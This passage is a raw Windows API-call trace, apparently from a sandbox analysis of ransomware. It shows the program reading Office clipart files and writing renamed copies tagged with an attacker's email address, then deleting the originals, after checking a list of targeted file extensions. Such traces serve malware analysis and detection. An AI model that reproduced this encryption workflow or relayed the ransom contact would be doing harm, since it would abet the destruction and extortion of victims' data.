returned 63 [0271.462] lstrlenW (lpString=".zip") returned 4 [0271.462] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.462] lstrlenW (lpString=".rar") returned 4 [0271.462] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.462] lstrlenW (lpString=".bz2") returned 4 [0271.462] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.462] lstrlenW (lpString=".7z") returned 3 [0271.462] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.462] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF") returned 63 [0271.463] lstrlenW (lpString=".dbf") returned 4 [0271.463] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF") returned 63 [0271.463] lstrlenW (lpString=".1cd") returned 4 [0271.463] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF") returned 63 [0271.463] lstrlenW (lpString=".jpg") returned 4 [0271.463] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.463] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.463] lstrlenW (lpString="FD00586_.WMF") returned 12 [0271.463] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00586_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0271.463] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=752) returned 1 [0271.463] CloseHandle (hObject=0x3ac) returned 1 [0271.463] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00586_.wmf")) returned 0x20 [0271.463] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00586_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.464] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00586_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0271.464] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.464] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.464] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00586_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0271.464] GetLastError () returned 0x0 [0271.464] ReadFile (in: hFile=0x3ac, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x2f0, lpOverlapped=0x0) returned 1 [0271.488] WriteFile (in: hFile=0x3b4, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x300, lpOverlapped=0x0) returned 1 [0271.489] ReadFile (in: hFile=0x3ac, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.489] WriteFile (in: hFile=0x3b4, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.489] SetEndOfFile (hFile=0x3b4) returned 1 [0271.489] CloseHandle (hObject=0x3b4) returned 1 [0271.489] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.489] SetEndOfFile (hFile=0x3ac) returned 1 [0271.491] CloseHandle (hObject=0x3ac) returned 1 [0271.491] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.491] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00586_.wmf")) returned 1 [0271.491] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF") returned 63 [0271.491] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF") returned 63 [0271.491] lstrlenW (lpString=".doc") returned 4 [0271.491] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.492] lstrlenW (lpString=".docx") returned 5 [0271.492] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.492] lstrlenW (lpString=".pdf") returned 4 [0271.492] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.492] lstrlenW (lpString=".xls") returned 4 [0271.492] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.492] lstrlenW (lpString=".xlsx") returned 5 [0271.492] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.492] lstrlenW (lpString=".ppt") returned 4 [0271.492] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF") returned 63 [0271.492] lstrlenW (lpString=".zip") returned 4 [0271.492] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.492] lstrlenW (lpString=".rar") returned 4 [0271.492] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.492] lstrlenW (lpString=".bz2") returned 4 [0271.492] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.492] lstrlenW (lpString=".7z") returned 3 [0271.492] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF") returned 63 [0271.492] lstrlenW (lpString=".dbf") returned 4 [0271.492] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF") returned 63 [0271.492] lstrlenW (lpString=".1cd") returned 4 [0271.492] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF") returned 63 [0271.492] lstrlenW (lpString=".jpg") returned 4 [0271.492] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF") returned 63 [0271.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF") returned 63 [0271.492] lstrlenW (lpString=".doc") returned 4 [0271.493] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.493] lstrlenW (lpString=".docx") returned 5 [0271.493] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.493] lstrlenW (lpString=".pdf") returned 4 [0271.493] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.493] lstrlenW (lpString=".xls") returned 4 [0271.493] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.493] lstrlenW (lpString=".xlsx") returned 5 [0271.493] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.493] lstrlenW (lpString=".ppt") returned 4 [0271.493] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF") returned 63 [0271.493] lstrlenW (lpString=".zip") returned 4 [0271.493] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.493] lstrlenW (lpString=".rar") returned 4 [0271.493] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.493] lstrlenW (lpString=".bz2") returned 4 [0271.493] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.493] lstrlenW (lpString=".7z") returned 3 [0271.493] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF") returned 63 [0271.493] lstrlenW (lpString=".dbf") returned 4 [0271.493] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF") returned 63 [0271.493] lstrlenW (lpString=".1cd") returned 4 [0271.493] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF") returned 63 [0271.493] lstrlenW (lpString=".jpg") returned 4 [0271.493] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.494] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.494] lstrlenW (lpString="FD00799_.WMF") returned 12 [0271.494] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00799_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0271.531] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=13968) returned 1 [0271.531] CloseHandle (hObject=0x380) returned 1 [0271.531] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00799_.wmf")) returned 0x20 [0271.533] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00799_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.533] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00799_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0271.533] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.533] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.533] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00799_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a8 [0271.534] GetLastError () returned 0x0 [0271.534] ReadFile (in: hFile=0x390, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x3690, lpOverlapped=0x0) returned 1 [0271.536] WriteFile (in: hFile=0x2a8, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x36a0, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x36a0, lpOverlapped=0x0) returned 1 [0271.537] ReadFile (in: hFile=0x390, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.537] WriteFile (in: hFile=0x2a8, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.537] SetEndOfFile (hFile=0x2a8) returned 1 [0271.537] CloseHandle (hObject=0x2a8) returned 1 [0271.537] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.537] SetEndOfFile (hFile=0x390) returned 1 [0271.539] CloseHandle (hObject=0x390) returned 1 [0271.539] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.539] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00799_.wmf")) returned 1 [0271.540] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF") returned 63 [0271.540] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF") returned 63 [0271.540] lstrlenW (lpString=".doc") returned 4 [0271.540] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.540] lstrlenW (lpString=".docx") returned 5 [0271.540] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.540] lstrlenW (lpString=".pdf") returned 4 [0271.540] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.540] lstrlenW (lpString=".xls") returned 4 [0271.540] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.540] lstrlenW (lpString=".xlsx") returned 5 [0271.540] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.540] lstrlenW (lpString=".ppt") returned 4 [0271.540] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.540] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF") returned 63 [0271.540] lstrlenW (lpString=".zip") returned 4 [0271.540] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.540] lstrlenW (lpString=".rar") returned 4 [0271.540] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.540] lstrlenW (lpString=".bz2") returned 4 [0271.540] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.540] lstrlenW (lpString=".7z") returned 3 [0271.541] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF") returned 63 [0271.541] lstrlenW (lpString=".dbf") returned 4 [0271.541] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF") returned 63 [0271.541] lstrlenW (lpString=".1cd") returned 4 [0271.541] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF") returned 63 [0271.541] lstrlenW (lpString=".jpg") returned 4 [0271.541] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF") returned 63 [0271.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF") returned 63 [0271.541] lstrlenW (lpString=".doc") returned 4 [0271.541] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.541] lstrlenW (lpString=".docx") returned 5 [0271.541] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.541] lstrlenW (lpString=".pdf") returned 4 [0271.541] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.541] lstrlenW (lpString=".xls") returned 4 [0271.541] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.541] lstrlenW (lpString=".xlsx") returned 5 [0271.541] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.541] lstrlenW (lpString=".ppt") returned 4 [0271.541] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF") returned 63 [0271.541] lstrlenW (lpString=".zip") returned 4 [0271.541] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.541] lstrlenW (lpString=".rar") returned 4 [0271.541] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.541] lstrlenW (lpString=".bz2") returned 4 [0271.542] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.542] lstrlenW (lpString=".7z") returned 3 [0271.542] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF") returned 63 [0271.542] lstrlenW (lpString=".dbf") returned 4 [0271.542] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF") returned 63 [0271.542] lstrlenW (lpString=".1cd") returned 4 [0271.542] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00799_.WMF") returned 63 [0271.542] lstrlenW (lpString=".jpg") returned 4 [0271.542] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.542] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.542] lstrlenW (lpString="FD00814_.WMF") returned 12 [0271.542] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00814_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0271.543] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=42704) returned 1 [0271.543] CloseHandle (hObject=0x390) returned 1 [0271.543] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00814_.wmf")) returned 0x20 [0271.543] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00814_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.543] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00814_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0271.543] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.543] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.543] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00814_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a8 [0271.544] GetLastError () returned 0x0 [0271.544] ReadFile (in: hFile=0x390, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0xa6d0, lpOverlapped=0x0) returned 1 [0271.548] WriteFile (in: hFile=0x2a8, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xa6e0, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xa6e0, lpOverlapped=0x0) returned 1 [0271.549] ReadFile (in: hFile=0x390, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.549] WriteFile (in: hFile=0x2a8, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.550] SetEndOfFile (hFile=0x2a8) returned 1 [0271.550] CloseHandle (hObject=0x2a8) returned 1 [0271.550] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.550] SetEndOfFile (hFile=0x390) returned 1 [0271.552] CloseHandle (hObject=0x390) returned 1 [0271.552] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.552] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00814_.wmf")) returned 1 [0271.552] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF") returned 63 [0271.552] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF") returned 63 [0271.552] lstrlenW (lpString=".doc") returned 4 [0271.552] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.552] lstrlenW (lpString=".docx") returned 5 [0271.552] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.552] lstrlenW (lpString=".pdf") returned 4 [0271.553] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.553] lstrlenW (lpString=".xls") returned 4 [0271.553] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.553] lstrlenW (lpString=".xlsx") returned 5 [0271.553] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.553] lstrlenW (lpString=".ppt") returned 4 [0271.553] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF") returned 63 [0271.553] lstrlenW (lpString=".zip") returned 4 [0271.553] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.553] lstrlenW (lpString=".rar") returned 4 [0271.553] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.553] lstrlenW (lpString=".bz2") returned 4 [0271.553] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.553] lstrlenW (lpString=".7z") returned 3 [0271.553] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF") returned 63 [0271.553] lstrlenW (lpString=".dbf") returned 4 [0271.553] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF") returned 63 [0271.553] lstrlenW (lpString=".1cd") returned 4 [0271.553] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF") returned 63 [0271.553] lstrlenW (lpString=".jpg") returned 4 [0271.553] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF") returned 63 [0271.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF") returned 63 [0271.553] lstrlenW (lpString=".doc") returned 4 [0271.553] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.553] lstrlenW (lpString=".docx") returned 5 [0271.554] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.554] lstrlenW (lpString=".pdf") returned 4 [0271.554] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.554] lstrlenW (lpString=".xls") returned 4 [0271.554] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.554] lstrlenW (lpString=".xlsx") returned 5 [0271.554] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.554] lstrlenW (lpString=".ppt") returned 4 [0271.554] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF") returned 63 [0271.554] lstrlenW (lpString=".zip") returned 4 [0271.554] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.554] lstrlenW (lpString=".rar") returned 4 [0271.554] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.554] lstrlenW (lpString=".bz2") returned 4 [0271.554] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.554] lstrlenW (lpString=".7z") returned 3 [0271.554] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF") returned 63 [0271.554] lstrlenW 